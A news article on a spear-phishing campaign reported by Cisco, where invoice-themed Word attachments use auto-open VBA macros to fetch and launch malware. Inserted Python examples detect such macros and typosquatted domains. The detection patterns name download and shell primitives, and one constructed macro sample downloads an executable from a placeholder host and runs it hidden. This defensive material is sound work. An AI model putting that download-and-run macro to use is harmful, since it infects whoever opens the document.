Spear phishers abuse Word programming feature to infect targets

Hackers abused Microsoft's Visual Basic for Applications (VBA) to rig email attachments, Cisco reveals.

An attack group with a penchant for high-profit businesses, including those in the banking, oil and entertainment industries, is using a spear phishing campaign to target victims, Cisco warns.

Craig Williams, technical leader of Cisco's Threat Research Analysis and Communications (TRAC) team, delved into attackers' exploits in a Monday blog post. According to Williams, the group lures targets with malicious emails crafted to look like business invoices.

Those who take the bait, which here means phishing emails crafted for specific company members, download malware via a malicious Microsoft Word attachment. When the attachment is opened, the file is rigged to download a malicious executable, Williams wrote. The malware contacts several domains during this process, including Dropbox, a cloud-based file-sharing service, where the attackers host malware payloads.

In email correspondence with SCMagazine.com, Williams explained that hackers leveraged a Microsoft programming language, Visual Basic for Applications, to lay their trap.

“This is really an abused feature,” Williams said. “The attacks are using Visual Basic Scripting for Applications to cause an On-Open macro to fire when the victim opens the Word document. This will result in downloading an executable and launching it on the victim's machine. It's quite an old technique,” he added.
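The chain Williams describes (an auto-executing macro that downloads an executable and launches it) is easy to recognise statically once the VBA source has been extracted from the document. The following Python is an added example, not code from the article or from Cisco: it looks for the three ingredients together, an auto-exec procedure name, a download primitive and an execution primitive, and reports them alongside any URLs in the module. The macro text it runs over is constructed for illustration and is never executed; its URL, file name and procedure names are made up.

```python
"""Static triage of VBA macro source for the auto-open download-and-run pattern.

Added example, not code from the original article or from Cisco. The macro text
below is constructed for illustration and is never executed: the URL, file name
and procedure names are made up.
"""
import re

# Procedure names that Word or Excel run on their own when a document is opened
# or closed. A macro bound to one of these fires as soon as macros are enabled,
# which is the "On-Open" trigger described in the article.
AUTO_EXEC_NAMES = {
    "autoopen", "document_open", "autoexec", "auto_open",
    "workbook_open", "autoclose", "document_close",
}

# Typical ways a macro dropper fetches a payload (name -> regex).
DOWNLOAD_PATTERNS = {
    "URLDownloadToFile": r"\bURLDownloadToFile",   # also matches the ...A/...W aliases
    "MSXML2.XMLHTTP": r"MSXML2\.(?:Server)?XMLHTTP",
    "WinHttpRequest": r"WinHttp\.WinHttpRequest",
    "ADODB.Stream": r"ADODB\.Stream",
}

# Typical ways it then launches what it fetched.
EXEC_PATTERNS = {
    "Shell": r"(?<![.\w])Shell\b",     # the Shell statement, not WScript.Shell / ShellExecute
    "WScript.Shell": r"WScript\.Shell",
    "ShellExecute": r"\bShellExecute\b",
}

PROC_RE = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+([A-Za-z_]\w*)",
    re.IGNORECASE | re.MULTILINE,
)
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def _found(patterns: dict, source: str) -> list:
    """Names of the patterns that occur in the source (VBA is case-insensitive)."""
    return sorted(name for name, pat in patterns.items()
                  if re.search(pat, source, re.IGNORECASE))


def triage_vba(source: str) -> dict:
    """Return the indicators found in one module's VBA source text.

    `dropper` is True when an auto-exec trigger, a download primitive and an
    execution primitive all appear together, i.e. the chain the article describes.
    """
    procs = PROC_RE.findall(source)
    auto_exec = sorted(p for p in procs if p.lower() in AUTO_EXEC_NAMES)
    downloads = _found(DOWNLOAD_PATTERNS, source)
    execs = _found(EXEC_PATTERNS, source)
    urls = sorted(set(URL_RE.findall(source)))
    return {
        "auto_exec": auto_exec,
        "download_apis": downloads,
        "exec_apis": execs,
        "urls": urls,
        "dropper": bool(auto_exec and downloads and execs),
    }


# Constructed sample: the shape of an invoice-themed macro dropper (inert text only).
SAMPLE_MACRO = r'''
Private Declare Function URLDownloadToFileA Lib "urlmon" _
    (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, _
     ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Sub AutoOpen()
    Dim target As String
    target = Environ("TEMP") & "\invoice.exe"
    URLDownloadToFileA 0, "http://files.example/invoice.exe", target, 0, 0
    Shell target, vbHide
End Sub
'''

# Constructed sample: a harmless macro that should not be flagged.
BENIGN_MACRO = '''
Sub FormatInvoiceTable()
    ActiveDocument.Tables(1).Style = "Grid Table 4"
End Sub
'''

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        print(label, triage_vba(src))
```

In practice the source text comes from a macro extractor (for example oletools' olevba) run against the attachment; the check above is deliberately a pattern match on the three ingredients rather than a full parser, so an obfuscated macro that builds its API names from string fragments at runtime will need the extractor's deobfuscation pass first, or a sandbox detonation, to be caught.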

Along with the Dropbox URL, other domains the malware contacted, such as londonpaerl.co.uk (a lookalike of the legitimate site londonpearl.co.uk, with two letters transposed), were used to host backdoors, though Cisco blocked the malware for its customers.
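A transposed-letter domain like londonpaerl.co.uk is the kind of thing a proxy-log review can surface automatically. The Python below is an added example, not code from the article or from Cisco: it measures the edit distance (with adjacent transpositions counted as one step) between every contacted hostname and a watchlist of domains worth protecting, and reports near-misses that are not exact matches. The contacted-host list and the watchlist are constructed; only the londonpaerl.co.uk / londonpearl.co.uk pair comes from the article.

```python
"""Flag contacted hostnames that are near-misses of domains on a watchlist.

Added example, not code from the original article or from Cisco. The lists of
contacted hosts and watched domains are constructed; only londonpaerl.co.uk and
londonpearl.co.uk come from the article.
"""


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete, substitute, plus one
    adjacent transposition, so 'paerl' is one step from 'pearl'."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,          # deletion
                          d[i][j - 1] + 1,          # insertion
                          d[i - 1][j - 1] + cost)   # substitution
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[len(a)][len(b)]


def normalize(host: str) -> str:
    """Lower-case, drop a trailing dot and a leading 'www.' so the comparison
    is on the registrable name rather than on presentation details."""
    host = host.strip().lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def lookalike_matches(contacted, watchlist, max_distance=2):
    """Return (contacted, watched, distance) for hosts within max_distance of a
    watched domain but not equal to it; an exact match is the legitimate site."""
    findings = []
    for host in contacted:
        h = normalize(host)
        for good in watchlist:
            g = normalize(good)
            if h == g:
                continue
            dist = osa_distance(h, g)
            if dist <= max_distance:
                findings.append((host, good, dist))
    return findings


# Constructed: hostnames as they might appear in proxy logs for an infected host.
CONTACTED = ["londonpaerl.co.uk", "londonpearl.co.uk", "www.dropbox.com", "example.org"]
# Constructed: domains the organisation treats as legitimate and worth protecting.
WATCHLIST = ["londonpearl.co.uk", "dropbox.com"]

if __name__ == "__main__":
    for host, good, dist in lookalike_matches(CONTACTED, WATCHLIST):
        print(f"{host} is {dist} edit(s) away from {good}")
```

Edit distance is a triage signal, not a verdict: it will also flag a partner's genuinely similar domain, and it misses lookalikes built from homoglyphs, internationalised domain names or an extra word (londonpearl-invoices.co.uk), which need separate checks. Keep max_distance small; at 2 on a short name the false-positive rate climbs quickly.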

According to Williams, Cisco thwarted attacks from the group throughout May and June, though the majority of attacks occurred last month.

The spear phishing campaign has, so far, targeted organizations in Europe, Williams wrote, adding that hackers were likely motivated by “monetary gain.”

Next week, Cisco plans to divulge more information on the group's exploits, specifically the malware used by attackers and their obfuscation techniques, the company blog post said.
